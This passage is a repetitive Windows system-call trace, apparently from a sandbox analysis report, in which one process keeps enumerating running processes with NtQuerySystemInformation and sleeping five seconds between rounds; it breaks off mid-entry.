[0130.073] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0130.074] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0130.074] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0130.074] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0130.076] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0130.076] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0130.089] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0130.089] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0130.089] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0130.090] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0130.090] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0130.092] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0130.092] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0130.106] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0130.106] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0130.107] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0130.107] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0130.108] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0130.111] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0130.112] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0130.120] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0130.121] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0130.121] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0130.122] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0130.122] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0130.125] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0130.125] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0130.138] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0130.138] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0130.139] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0130.139] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0130.139] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0130.142] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0130.143] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0130.151] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0130.152] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0130.152] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0130.152] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0130.153] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0130.155] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0130.155] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0130.167] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0130.168] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0130.168] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0130.168] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0130.169] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0130.171] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0130.171] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0130.182] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0130.183] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0130.183] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0130.183] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0130.183] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0130.185] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0130.186] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0130.198] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0130.198] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0130.199] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0130.199] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0130.199] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0130.201] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0130.202] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0130.214] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0130.215] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0130.215] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0130.215] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0130.216] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0130.218] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0130.218] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0130.229] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0130.229] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0130.230] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0130.230] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0130.230] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0130.232] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0130.233] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0130.245] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0130.245] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0130.245] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0130.246] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0130.246] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0130.248] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0130.249] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0130.261] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0130.261] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0130.262] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0130.262] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0130.262] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0130.264] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0130.265] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0130.276] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0130.276] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0130.277] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0130.277] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0130.277] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0130.279] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0130.280] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0130.291] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0130.292] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0130.292] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0130.292] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0130.293] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0130.294] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0130.295] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0130.307] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0130.307] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0130.308] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0130.308] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0130.308] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0130.310] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0130.311] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0130.324] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0130.324] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0130.325] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0130.325] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0130.325] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0130.327] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0130.328] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0130.338] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0130.339] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0130.339] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0130.339] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0130.340] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0130.341] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0130.342] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0130.354] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0130.354] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0130.355] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0130.355] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0130.355] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0130.357] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0130.358] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0130.369] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0130.370] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0130.370] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0130.371] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0130.371] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0130.373] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0130.373] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0130.385] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0130.385] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0130.386] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0130.386] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0130.386] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0130.388] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0130.389] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0130.401] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0130.401] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0130.401] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0130.402] 